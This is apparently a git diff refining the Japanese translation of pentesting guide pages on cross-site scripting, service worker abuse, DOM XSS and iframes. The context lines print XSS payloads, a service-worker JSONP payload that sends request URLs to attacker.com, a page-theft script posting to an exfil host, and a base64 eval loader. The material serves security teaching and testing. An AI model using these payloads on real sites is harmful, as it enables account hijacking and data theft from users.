+もし、**非常に小さな部分**のウェブでXSSを見つけた場合、何らかのインタラクションが必要です(例えば、マウスオーバー要素を持つフッターの小さなリンクなど)、その要素が占めるスペースを**変更してリンクが発火する確率を最大化**することを試みることができます。
 
 例えば、要素に次のようなスタイルを追加することができます:`position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
 
@@ -458,7 +459,7 @@ onbeforetoggle="alert(2)" />
 
 > .test {display:block; color: blue; width: 100%\}
 
-と
+および
 
 > \#someid {top: 0; font-family: Tahoma;}
 
@@ -474,7 +475,7 @@ onbeforetoggle="alert(2)" />
 
 ### \`の中に挿入されている場合、**``の中に挿入されている場合、`
 ```
@@ -482,7 +483,7 @@ onbeforetoggle="alert(2)" />
 
 ### JSコード内
 
-`<>`がサニタイズされている場合でも、**文字列をエスケープ**して、入力が**存在する場所**で**任意のJSを実行**することができます。JSの構文を**修正する**ことが重要です。エラーがあると、JSコードは実行されません:
+`<>`がサニタイズされている場合でも、**文字列をエスケープ**し、**任意のJSを実行**することができます。JSの構文を**修正する**ことが重要です。エラーがあると、JSコードは実行されません:
 ```
 '-alert(document.domain)-'
 ';alert(document.domain)//
@@ -490,8 +491,8 @@ onbeforetoggle="alert(2)" />
 ```
 ### テンプレートリテラル \`\`
 
-**文字列**を構築するために、シングルクォートやダブルクォートとは別に、JSは**バックティック** **` `` `**も受け入れます。これはテンプレートリテラルと呼ばれ、`${ ... }`構文を使用して**JS式を埋め込む**ことができます。\
-したがって、バックティックを使用しているJS文字列内に入力が**反映**されていることがわかった場合、構文`${ ... }`を悪用して**任意のJSコード**を実行できます:
+**文字列**を構築するために、シングルクォートやダブルクォートの他に、JSは**バックティック** **` `` `**も受け入れます。これはテンプレートリテラルと呼ばれ、`${ ... }`構文を使用して**JS式を埋め込む**ことができます。\
+したがって、バックティックを使用しているJS文字列内に入力が**反映**されていることがわかった場合、構文`${ ... }`を悪用して**任意のJSコード**を実行することができます:
 
 これは次のように**悪用**できます:
 ```javascript
@@ -564,7 +565,7 @@ eval(8680439..toString(30))(983801..toString(36))
 #!This is a 1 line comment, but "#!" must to be at the beggining of the first line
 -->This is a 1 line comment, but "-->" must to be at the beggining of the first line
 ```
-**JavaScriptの新しい行(から** [**JavaScriptの新しい行**](#javascript-new-lines) **トリック)**
+**JavaScriptの改行(から** [**JavaScriptの改行**](#javascript-new-lines) **トリック)**
 ```javascript
 //Javascript interpret as new line these chars:
 String.fromCharCode(10)
@@ -741,21 +742,23 @@ top[8680439..toString(30)](1)
 ```
 ## **DOMの脆弱性**
 
-攻撃者によって制御された**安全でないデータ**を使用している**JSコード**があります。例えば`location.href`のように。攻撃者はこれを悪用して任意のJSコードを実行することができます。\
-**DOMの脆弱性に関する説明が拡張されたため、** [**このページに移動しました**](dom-xss.md)**:**
+攻撃者によって制御される**安全でないデータ**を使用している**JSコード**があります。例えば、`location.href`のようなものです。攻撃者はこれを悪用して任意のJSコードを実行することができます。\
+**DOMの脆弱性に関する説明が長くなったため、** [**このページに移動しました**](dom-xss.md)**:**
+
 
 {{#ref}}
 dom-xss.md
 {{#endref}}
 
-そこでは、**DOMの脆弱性とは何か、どのように引き起こされるのか、そしてそれをどのように悪用するのかについての詳細な説明**が見つかります。\
-また、**前述の投稿の最後に** [**DOM Clobbering攻撃**](dom-xss.md#dom-clobbering)についての説明があることを忘れないでください。
+そこでは、**DOMの脆弱性とは何か、どのように引き起こされるのか、そしてどのように悪用されるのかについての詳細な説明**が見つかります。\
+また、**前述の投稿の最後には、** [**DOM Clobbering攻撃**](dom-xss.md#dom-clobbering)についての説明がありますので、お忘れなく。
 
 ### Self-XSSのアップグレード
 
 ### Cookie XSS
 
-もしペイロードをクッキー内に送信することでXSSをトリガーできる場合、これは通常self-XSSです。しかし、もし**XSSに対して脆弱なサブドメイン**を見つけた場合、このXSSを悪用して全ドメインにクッキーを注入し、メインドメインまたは他のサブドメイン(クッキーXSSに対して脆弱なもの)でクッキーXSSをトリガーすることができます。このために、クッキー投げ攻撃を使用できます:
+もし、ペイロードをクッキー内に送信することでXSSをトリガーできる場合、これは通常self-XSSです。しかし、もし**XSSに対して脆弱なサブドメイン**を見つけた場合、このXSSを悪用して全ドメインにクッキーを注入し、メインドメインや他のサブドメイン(クッキーXSSに対して脆弱なもの)でクッキーXSSをトリガーすることができます。このために、クッキー投げ攻撃を使用できます:
+
 
 {{#ref}}
 ../hacking-with-cookies/cookie-tossing.md
@@ -779,13 +782,13 @@ self XSSを見つけ、ウェブページに**管理者用のセッションミ
 
 **反映された値**がサーバー(またはクライアント側)で**Unicode正規化**されているかどうかを確認し、この機能を悪用して保護をバイパスすることができます。[**ここに例があります**](../unicode-injection/index.html#xss-cross-site-scripting)。
 
-### PHP FILTER_VALIDATE_EMAILフラグバイパス
+### PHP FILTER_VALIDATE_EMAILフラグのバイパス
 ```javascript
 ">"@x.y
 ```
 ### Ruby-On-Rails バイパス
 
-**RoR マスアサインメント** により、HTMLに引用符が挿入され、その後引用制限がバイパスされ、タグ内に追加のフィールド(onfocus)を追加できます。\
+**RoR マスアサインメント** により、HTMLに引用符が挿入され、その後引用制限がバイパスされ、追加のフィールド(onfocus)がタグ内に追加されることがあります。\
 フォームの例 ([from this report](https://hackerone.com/reports/709336))、ペイロードを送信すると:
 ```
 contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
@@ -830,7 +833,7 @@ document['default'+'View'][`\u0061lert`](3)
 
 もしあなたが **302リダイレクトレスポンスにヘッダーを注入できる** ことがわかった場合、**ブラウザに任意のJavaScriptを実行させる**ことを試みることができます。これは **簡単ではありません**。なぜなら、現代のブラウザはHTTPレスポンスステータスコードが302の場合、HTTPレスポンスボディを解釈しないため、単なるクロスサイトスクリプティングペイロードは無意味だからです。
 
-[**このレポート**](https://www.gremwell.com/firefox-xss-302) と [**こちら**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) では、Locationヘッダー内でいくつかのプロトコルをテストし、それらのいずれかがブラウザにボディ内のXSSペイロードを検査して実行させることを許可するかどうかを確認する方法を読むことができます。\
+[**このレポート**](https://www.gremwell.com/firefox-xss-302) と [**こちら**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) では、Locationヘッダー内でいくつかのプロトコルをテストし、それらのいずれかがブラウザにXSSペイロードをボディ内で検査および実行させることを許可するかどうかを確認する方法を読むことができます。\
 過去に知られているプロトコル: `mailto://`, `//x:1/`, `ws://`, `wss://`, _空のLocationヘッダー_, `resource://`。
 
 ### Only Letters, Numbers and Dots
@@ -867,7 +870,7 @@ const char* const kSupportedJavascriptTypes[] = {
 ```
 ### Script Types to XSS
 
-(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) では、どのタイプがスクリプトを読み込むことを示す可能性がありますか?
+(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) では、どのタイプがスクリプトを読み込むために指定される可能性がありますか?
 ```html
 
 ```
@@ -899,7 +902,7 @@ import moment from "moment"
 import { partition } from "lodash"
 
 ```
-この動作は、[**この解説**](https://github.com/zwade/yaca/tree/master/solution)でライブラリをevalに再マッピングしてXSSを引き起こすために悪用されることができます。
+この動作は、[**この解説**](https://github.com/zwade/yaca/tree/master/solution)でライブラリをevalに再マッピングしてXSSを引き起こすために悪用されることができることを示すために使用されました。
 
 - [**speculationrules**](https://github.com/WICG/nav-speculation)**:** この機能は、プリレンダリングによって引き起こされるいくつかの問題を解決するためのものです。動作は次のようになります:
 ```html
@@ -942,13 +945,14 @@ import { partition } from "lodash"
 
 
 ```
-### 特殊置換パターン
+### 特殊な置換パターン
 
-**`"some {{template}} data".replace("{{template}}", )`** のようなものが使用されるとき、攻撃者は[**特殊文字列置換**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#specifying_a_string_as_the_replacement)を使用して、いくつかの保護を回避しようとすることがあります: `` "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"})) ``
+**`"some {{template}} data".replace("{{template}}", )`** のようなものが使用されるとき、攻撃者は[**特殊な文字列置換**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#specifying_a_string_as_the_replacement)を使用して、いくつかの保護を回避しようとすることがあります: `` "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"})) ``
 
 例えば、[**この書き込み**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA)では、スクリプト内の**JSON文字列をエスケープ**し、任意のコードを実行するために使用されました。
 
-### ChromeキャッシュからXSSへ
+### ChromeキャッシュからXSS
+
 
 {{#ref}}
 chrome-cache-to-xss.md
@@ -1051,7 +1055,7 @@ trigger()
 ```
 ### Obfuscation & Advanced Bypass
 
-- **1ページ内の異なる難読化:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
+- **異なる難読化が1ページに:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
 - [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
 - [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
 - [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/)
@@ -1240,7 +1244,7 @@ steal-info-js.md
 
 ### Iframeトラップ
 
-ユーザーがiframeを退出せずにページ内を移動させ、その行動を盗む(フォームに送信された情報を含む):
+ユーザーがiframeを退出せずにページ内を移動させ、その行動を盗む(フォームに送信された情報を含む):
 
 {{#ref}}
 ../iframe-traps.md
@@ -1271,7 +1275,7 @@ steal-info-js.md
 > [!TIP]
 > あなたは**HTTPOnlyフラグがクッキーに設定されている場合、JavaScriptからクッキーにアクセスすることはできません**。しかし、運が良ければ、ここに[この保護を回避するいくつかの方法があります](../hacking-with-cookies/index.html#httponly)。
 
-### ページコンテンツの盗難
+### ページコンテンツを盗む
 ```javascript
 var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"
 var attacker = "http://10.10.14.8/exfil"
@@ -1360,7 +1364,7 @@ console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms")
 };
 }
 ```
-_短い時間は応答しているポートを示します_ _長い時間は応答がないことを示します。_
+_応答しているポートは短い時間を示します_ _応答がないポートは長い時間を示します。_
 
 Chromeで禁止されているポートのリストを[**こちら**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc)で、Firefoxでのリストを[**こちら**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist)で確認してください。
 
@@ -1383,7 +1387,7 @@ body:username.value+':'+this.value
 
 ### キーロガー
 
-GitHubでいくつかの異なるものを見つけました:
+GitHubで検索したところ、いくつかの異なるものが見つかりました:
 
 - [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
 - [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
@@ -1415,25 +1419,28 @@ document.getElementById("message").src += "&"+e.data;
 ```
 ### サービスワーカーの悪用
 
+
 {{#ref}}
 abusing-service-workers.md
 {{#endref}}
 
 ### シャドウDOMへのアクセス
 
+
 {{#ref}}
 shadow-dom.md
 {{#endref}}
 
 ### ポリグロット
 
+
 {{#ref}}
 https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt
 {{#endref}}
 
 ### ブラインドXSSペイロード
 
-You can also use: [https://xsshunter.com/](https://xsshunter.com)
+あなたはまた使用できます: [https://xsshunter.com/](https://xsshunter.com)
 ```html
 ">
 ">
@@ -1498,7 +1505,7 @@ javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4Ln
 
 {{constructor.constructor("import('{SERVER}/script.js')")()}}
 ```
-### Regex - 隠れたコンテンツへのアクセス
+### Regex - 隠されたコンテンツへのアクセス
 
 From [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) it's possible to learn that even if some values disappear from JS, it's still possible to find them in JS attributes in different objects. For example, an input of a REGEX is still possible to find it after the value of the input of the regex was removed:
 ```javascript
@@ -1519,6 +1526,7 @@ document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
 ```
 ### ブルートフォースリスト
 
+
 {{#ref}}
 https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt
 {{#endref}}
@@ -1527,7 +1535,8 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt
 
 ### MarkdownにおけるXSS
 
-レンダリングされるMarkdownコードを注入できますか?もしかしたらXSSを取得できるかもしれません!確認してください:
+レンダリングされるMarkdownコードを注入できますか?もしかしたらXSSを取得できるかもしれません!確認してください:
+
 
 {{#ref}}
 xss-in-markdown.md
@@ -1535,7 +1544,7 @@ xss-in-markdown.md
 
 ### SSRFへのXSS
 
-**キャッシングを使用しているサイト**でXSSを取得しましたか?このペイロードを使って**それをSSRFにアップグレード**してみてください:
+**キャッシングを使用しているサイト**でXSSを取得しましたか?このペイロードを使用して**それをSSRFにアップグレード**してみてください:
 ```python
 
 ```
@@ -1544,14 +1553,14 @@ xss-in-markdown.md
 
 ### 動的に作成されたPDFにおけるXSS
 
-ウェブページがユーザー制御の入力を使用してPDFを作成している場合、PDFを作成しているボットを**だまして**、**任意のJSコードを実行**させることができます。\
+ウェブページがユーザー制御の入力を使用してPDFを作成している場合、PDFを作成しているボットを**だまして任意のJSコードを実行させる**ことを試みることができます。\
 したがって、**PDF作成ボットが**何らかの**HTML** **タグ**を見つけると、それを**解釈**し、この動作を**悪用**して**サーバーXSS**を引き起こすことができます。
 
 {{#ref}}
 server-side-xss-dynamic-pdf.md
 {{#endref}}
 
-HTMLタグを注入できない場合は、**PDFデータを注入**してみる価値があるかもしれません:
+HTMLタグを注入できない場合は、**PDFデータを注入する**ことを試みる価値があります:
 
 {{#ref}}
 pdf-injection.md
@@ -1559,11 +1568,11 @@ pdf-injection.md
 
 ### Amp4EmailにおけるXSS
 
-AMPは、モバイルデバイスでのウェブページパフォーマンスを向上させることを目的としており、速度とセキュリティを重視してJavaScriptで補完されたHTMLタグを組み込んでいます。さまざまな機能のためのコンポーネントをサポートしており、[AMPコンポーネント](https://amp.dev/documentation/components/?format=websites)を介してアクセスできます。
+AMPは、モバイルデバイスでのウェブページパフォーマンスを向上させることを目的としており、速度とセキュリティを重視してJavaScriptで補完されたHTMLタグを組み込んでいます。さまざまな機能のためのコンポーネントの範囲をサポートしており、[AMPコンポーネント](https://amp.dev/documentation/components/?format=websites)を介してアクセスできます。
 
-[**AMP for Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/)フォーマットは、特定のAMPコンポーネントをメールに拡張し、受信者がメール内で直接コンテンツと対話できるようにします。
+[**AMP for Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/)フォーマットは、特定のAMPコンポーネントをメールに拡張し、受信者がメール内でコンテンツと直接対話できるようにします。
 
-例:[**GmailのAmp4EmailにおけるXSSの解説**](https://adico.me/post/xss-in-gmail-s-amp4email)。
+例として[**GmailのAmp4EmailにおけるXSSの書き込み**](https://adico.me/post/xss-in-gmail-s-amp4email)。
 
 ### ファイルのアップロードによるXSS(svg)
 
@@ -1627,6 +1636,7 @@ id="foo"/>
 
 ## その他のJSトリックと関連情報
 
+
 {{#ref}}
 other-js-tricks.md
 {{#endref}}
diff --git a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
index 5cc1d4c93..6b54fd31d 100644
--- a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
+++ b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
@@ -4,7 +4,7 @@
 
 ## 基本情報
 
-**サービスワーカー**は、ブラウザによってバックグラウンドで実行されるスクリプトで、ウェブページとは別に動作し、ウェブページやユーザーの操作を必要としない機能を可能にし、**オフラインおよびバックグラウンド処理**の能力を向上させます。サービスワーカーに関する詳細情報は[こちら](https://developers.google.com/web/fundamentals/primers/service-workers)で確認できます。脆弱なウェブドメイン内でサービスワーカーを悪用することで、攻撃者はそのドメイン内のすべてのページに対する被害者の操作を制御することができます。
+**サービスワーカー**は、ブラウザによってバックグラウンドで実行されるスクリプトで、ウェブページとは別に動作し、ウェブページやユーザーの操作を必要としない機能を有効にし、**オフラインおよびバックグラウンド処理**の能力を向上させます。サービスワーカーに関する詳細情報は[こちら](https://developers.google.com/web/fundamentals/primers/service-workers)で確認できます。脆弱なウェブドメイン内でサービスワーカーを悪用することで、攻撃者はそのドメイン内のすべてのページに対する被害者の操作を制御することができます。
 
 ### 既存のサービスワーカーの確認
 
@@ -46,18 +46,18 @@ xhttp2.send();
 });
 
 ```
-脆弱なJSONPエンドポイントを悪用する場合、`var sw`の中に値を入れる必要があります。例えば:
+脆弱なJSONPエンドポイントを悪用する場合、値を`var sw`の中に入れる必要があります。例えば:
 ```javascript
 var sw =
 "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//"
 ```
-C2に特化した**Service Workersの悪用**のための**Shadow Workers**があり、これらの脆弱性を悪用するのに非常に役立ちます。
+専用の**C2**があり、**Service Workersの悪用**に特化した[**Shadow Workers**](https://shadow-workers.github.io)は、これらの脆弱性を悪用するのに非常に役立ちます。
 
-**24時間キャッシュディレクティブ**は、悪意のあるまたは侵害された**サービスワーカー(SW)**の寿命を、XSS脆弱性の修正後最大24時間に制限します。オンラインクライアントの状態を前提としています。脆弱性を最小限に抑えるために、サイト運営者はSWスクリプトのTTL(Time-To-Live)を短くすることができます。開発者は、迅速な無効化のために[**サービスワーカーキルスイッチ**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776)を作成することも推奨されています。
+**24時間キャッシュディレクティブ**は、悪意のあるまたは侵害された**service worker (SW)**の寿命を、XSS脆弱性の修正後最大24時間に制限します。オンラインクライアントの状態を前提としています。脆弱性を最小限に抑えるために、サイト運営者はSWスクリプトのTTL(Time-To-Live)を短くすることができます。開発者は、迅速な無効化のために[**service worker kill-switch**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776)を作成することも推奨されています。
 
-## DOM Clobberingを介したSWでの`importScripts`の悪用
+## DOM Clobberingを介したSW内の`importScripts`の悪用
 
-サービスワーカーから呼び出される**`importScripts`**関数は、**異なるドメインからスクリプトをインポート**することができます。この関数が**攻撃者が**変更できる**パラメータを使用して呼び出されると、攻撃者は**自分のドメインからJSスクリプトをインポート**し、XSSを取得することができます。
+Service Workerから呼び出される**`importScripts`**関数は、**異なるドメインからスクリプトをインポート**することができます。この関数が**攻撃者が**変更できる**パラメータを使用して呼び出されると、攻撃者は**自分のドメインからJSスクリプトをインポート**し、XSSを取得することができます。
 
 **これはCSP保護を回避します。**
 
@@ -88,7 +88,7 @@ DOMクラッキングが何であるかの詳細については、次を確認
 dom-clobbering.md
 {{#endref}}
 
-SWが**`importScripts`**を呼び出すために使用しているURL/ドメインが**HTML要素内にある**場合、**DOMクラッキングを介してそれを変更することが可能**であり、SWが**あなたのドメインからスクリプトを読み込む**ようにできます。
+SWが**`importScripts`**を呼び出すために使用しているURL/ドメインが**HTML要素内にある**場合、**DOMクラッキングを介してそれを変更することが可能**であり、SWが**自分のドメインからスクリプトを読み込む**ようにできます。
 
 この例については、参照リンクを確認してください。
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
index 2f3df1d5e..67530a06a 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -4,15 +4,15 @@
 
 ## DOM 脆弱性
 
-DOM 脆弱性は、攻撃者が制御する **ソース**(`location.search`、`document.referrer`、または `document.cookie` など)からのデータが安全でない方法で **シンク** に転送されるときに発生します。シンクは、悪意のあるデータが与えられた場合に有害なコンテンツを実行またはレンダリングできる関数やオブジェクト(例:`eval()`、`document.body.innerHTML`)です。
+DOM 脆弱性は、攻撃者が制御する **ソース**(例えば、`location.search`、`document.referrer`、または `document.cookie`)からデータが安全でない方法で **シンク** に転送されるときに発生します。シンクは、悪意のあるデータが与えられた場合に有害なコンテンツを実行またはレンダリングできる関数やオブジェクト(例:`eval()`、`document.body.innerHTML`)です。
 
-- **ソース** は、攻撃者によって操作可能な入力であり、URL、クッキー、ウェブメッセージが含まれます。
+- **ソース** は、攻撃者によって操作可能な入力であり、URL、クッキー、ウェブメッセージを含みます。
 - **シンク** は、悪意のあるデータが悪影響を及ぼす可能性のある危険なエンドポイントであり、スクリプトの実行などを引き起こす可能性があります。
 
-リスクは、データが適切な検証やサニタイズなしにソースからシンクに流れるときに発生し、XSS のような攻撃を可能にします。
+リスクは、データが適切な検証やサニタイズなしにソースからシンクに流れるときに発生し、XSSのような攻撃を可能にします。
 
-> [!NOTE]
-> **最新のソースとシンクのリストは** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) **で確認できます。**
+> [!TIP]
+> **最新のソースとシンクのリストは** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) **で確認できます**
 
 **一般的なソース:**
 ```javascript
@@ -65,9 +65,9 @@ Database
 | [**クライアントサイドSQLインジェクション**](dom-xss.md#client-side-sql-injection)            | [**Webメッセージ操作**](dom-xss.md#web-message-manipulation)                 | `history.replaceState()`                                      | `WebSocket`                                                            |
 | `executeSql()`                                                                   | `postMessage()`                                                                     | \`\`                                                          | \`\`                                                                   |
 
-**`innerHTML`**シンクは、現代のブラウザでは`script`要素を受け入れず、`svg onload`イベントも発火しません。これは、`img`や`iframe`のような代替要素を使用する必要があることを意味します。
+**`innerHTML`** シンクは、現代のブラウザでは `script` 要素を受け入れず、`svg onload` イベントも発火しません。これは、`img` や `iframe` のような代替要素を使用する必要があることを意味します。
 
-この種のXSSはおそらく**最も見つけにくい**ものであり、JSコードの内部を調べ、**制御できる値**を持つオブジェクトを使用しているかどうかを確認し、その場合は**任意のJSを実行する方法があるかどうか**を確認する必要があります。
+この種のXSSはおそらく**最も見つけにくい**ものであり、JSコードの内部を調べ、**制御できる**オブジェクトを使用しているかどうかを確認し、その場合は**任意のJSを実行するために悪用する方法があるかどうか**を確認する必要があります。
 
 ## それらを見つけるためのツール
 
@@ -137,27 +137,27 @@ From: [https://portswigger.net/web-security/dom-based/document-domain-manipulati
 
 **Document-domain manipulation vulnerabilities** は、スクリプトが攻撃者が制御できるデータを使用して `document.domain` プロパティを設定する場合に発生します。
 
-`document.domain` プロパティは、ブラウザによる **same-origin policy** の **enforcement** において **key role** を果たします。異なるオリジンからの2つのページが `document.domain` を **同じ値** に設定すると、制限なしに相互作用できます。ブラウザは `document.domain` に割り当て可能な値に対して特定の **limits** を課しますが、実際のページオリジンに無関係な値の割り当てを防ぐための例外も存在します。通常、ブラウザは **child** または **parent domains** の使用を許可します。
+`document.domain` プロパティは、ブラウザによる **same-origin policy** の **施行** において **重要な役割** を果たします。異なるオリジンからの2つのページが `document.domain` を **同じ値** に設定すると、制限なしに相互作用できます。ブラウザは `document.domain` に割り当て可能な値に対して特定の **制限** を課しますが、実際のページオリジンに無関係な値の割り当てを防ぐための例外も存在します。通常、ブラウザは **子** または **親ドメイン** の使用を許可します。
 
 Sinks:
 ```javascript
 document.domain
 ```
-### WebSocket-URL ポイズニング
+### WebSocket-URL poisoning
 
 From: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning)
 
-**WebSocket-URL ポイズニング** は、スクリプトが **制御可能なデータを WebSocket 接続のターゲット URL** として利用する場合に発生します。
+**WebSocket-URL poisoning** は、スクリプトが **制御可能なデータをWebSocket接続のターゲットURLとして利用する** 場合に発生します。
 
 Sinks:
 
-`WebSocket` コンストラクタは、WebSocket-URL ポイズニングの脆弱性を引き起こす可能性があります。
+`WebSocket` コンストラクタは、WebSocket-URL poisoning 脆弱性を引き起こす可能性があります。
 
-### リンク操作
+### Link manipulation
 
 From: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation)
 
-**DOM ベースのリンク操作の脆弱性** は、スクリプトが **攻撃者が制御可能なデータを現在のページ内のナビゲーションターゲット** に書き込むときに発生します。例えば、クリック可能なリンクやフォームの送信 URL などです。
+**DOMベースのリンク操作脆弱性** は、スクリプトが **攻撃者が制御可能なデータを現在のページ内のナビゲーションターゲットに書き込む** 場合に発生します。例えば、クリック可能なリンクやフォームの送信URLなどです。
 
 Sinks:
 ```javascript
@@ -165,7 +165,7 @@ someDOMElement.href
 someDOMElement.src
 someDOMElement.action
 ```
-### Ajaxリクエスト操作
+### Ajaxリクエストの操作
 
 From: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation)
 
@@ -183,7 +183,7 @@ $.globalEval()
 
 From: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation)
 
-**ローカルファイルパス操作の脆弱性**は、スクリプトが**攻撃者が制御可能なデータをファイル処理APIに`filename`パラメータとして渡す**ときに発生します。この脆弱性は、攻撃者が他のユーザーが訪れた場合に**ユーザーのブラウザが任意のローカルファイルを開いたり書き込んだりする**URLを構築するために悪用される可能性があります。
+**ローカルファイルパス操作の脆弱性** は、スクリプトが **攻撃者が制御可能なデータをファイル処理APIに`filename`パラメータとして渡す** ときに発生します。この脆弱性は、攻撃者が他のユーザーが訪れた場合に **ユーザーのブラウザが任意のローカルファイルを開いたり書き込んだりする** URLを構築するために悪用される可能性があります。
 
 Sinks:
 ```javascript
@@ -199,7 +199,7 @@ FileReader.root.getFile()
 
 From: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection)
 
-**クライアントサイドSQLインジェクション脆弱性**は、スクリプトが**攻撃者が制御可能なデータをクライアントサイドのSQLクエリに安全でない方法で組み込むとき**に発生します。
+**クライアントサイドSQLインジェクションの脆弱性**は、スクリプトが**攻撃者が制御可能なデータをクライアントサイドのSQLクエリに安全でない方法で組み込むとき**に発生します。
 
 Sinks:
 ```javascript
@@ -243,17 +243,17 @@ $.parseJSON()
 
 From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation)
 
-**Web-messageの脆弱性**は、スクリプトが**攻撃者が制御可能なデータをウェブメッセージとしてブラウザ内の別のドキュメントに送信する**ときに発生します。脆弱なWeb-message操作の**例**は、[PortSwiggerのWeb Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source)で見つけることができます。
+**Web-message vulnerabilities** は、スクリプトが **攻撃者が制御可能なデータをウェブメッセージとしてブラウザ内の別のドキュメントに送信する** ときに発生します。脆弱なWebメッセージ操作の **例** は、[PortSwiggerのWeb Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source) で見つけることができます。
 
 Sinks:
 
-`postMessage()`メソッドを使用してウェブメッセージを送信する場合、メッセージを受信するためのイベントリスナーが受信データを安全でない方法で処理すると、脆弱性が発生する可能性があります。
+`postMessage()` メソッドを使用してウェブメッセージを送信する場合、メッセージを受信するためのイベントリスナーが受信データを安全でない方法で処理すると、脆弱性が発生する可能性があります。
 
 ### DOM-data manipulation
 
 From: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation)
 
-**DOMデータ操作の脆弱性**は、スクリプトが**攻撃者が制御可能なデータをDOM内のフィールドに書き込む**ときに発生します。このフィールドは、可視UIまたはクライアントサイドのロジックで利用されます。この脆弱性は、攻撃者がURLを構築するために悪用でき、他のユーザーがそのURLを訪れると、クライアントサイドのUIの外観や動作を変更することができます。
+**DOM-data manipulation vulnerabilities** は、スクリプトが **攻撃者が制御可能なデータをDOM内のフィールドに書き込む** ときに発生します。このフィールドは、可視UIまたはクライアントサイドのロジック内で利用されます。この脆弱性は、攻撃者が他のユーザーが訪問した場合にクライアントサイドのUIの外観や動作を変更するURLを構築するために悪用される可能性があります。
 
 Sinks:
 ```javascript
@@ -293,6 +293,7 @@ RegExp()
 ```
 ## Dom Clobbering
 
+
 {{#ref}}
 dom-clobbering.md
 {{#endref}}
diff --git a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
index 79eb52e0c..a733f8772 100644
--- a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
+++ b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
@@ -45,7 +45,7 @@ var secret = "child secret"
 alert(parent.secret)
 
 ```
-前のHTMLにHTTPサーバー(例えば`python3 -m http.server`)を介してアクセスすると、すべてのスクリプトが実行されることに気付くでしょう(CSPがそれを防いでいないため)。**親は任意のiframe内の`secret`変数にアクセスできません**が、**同サイトと見なされるif2とif3のみが元のウィンドウの秘密にアクセスできます**。\
+前のHTMLにHTTPサーバー(例えば`python3 -m http.server`)を介してアクセスすると、すべてのスクリプトが実行されることに気付くでしょう(CSPがそれを防いでいないため)。**親は任意のiframe内の`secret`変数にアクセスできません**が、**if2とif3のiframe(同一サイトと見なされる)は、元のウィンドウの秘密にアクセスできます**。\
 if4は`null`オリジンと見なされることに注意してください。
 
